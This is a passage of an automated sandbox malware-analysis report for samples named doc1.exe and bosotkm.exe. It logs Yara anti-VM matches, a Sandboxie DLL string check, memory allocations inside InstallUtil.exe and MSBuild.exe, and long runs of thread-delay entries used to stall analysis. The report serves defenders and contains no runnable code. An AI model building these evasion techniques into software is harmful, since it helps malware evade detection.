                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\doc1.exeMemory allocated: 1060000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory allocated: 4A50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory allocated: 15F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory allocated: 30B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory allocated: 50B0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1030000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2C90000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2AC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory allocated: 1740000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory allocated: 32E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory allocated: 52E0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A00000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BD0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4BD0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 17F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3130000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 5130000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 13D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2E50000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4E50000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 26B0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2730000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4730000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1270000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2D00000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2C20000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1300000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F40000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2D80000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599447Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599338Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599231Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598898Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598790Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596083Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594513Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594181Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594055Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593924Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593793Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593059Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599871
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599421
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599201
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599093
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598973
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598852
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598422
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597524
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596266
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594933
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594716
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594426
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594139
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599233
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598577
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598248
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597605
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597499
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597160
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596374
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596155
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595936
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595827
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595496
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594624
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594515
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594281
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4725Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5088Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5244Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4604Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6501
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3164
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4991
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5201
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5364
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4319
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6433
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3192
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6728
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2907
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6732
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2883
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5174
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 763
                  Source: C:\Windows\SysWOW64\wscript.exe TID: 2744Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exe TID: 2832Thread sleep time: -90000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep count: 36 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1944Thread sleep count: 4725 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1944Thread sleep count: 5088 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -599563s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -599447s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -599338s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -599231s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -598898s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -598790s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -598687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -598469s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4032Thread sleep time: -598125s >= -30000sJump to behavior
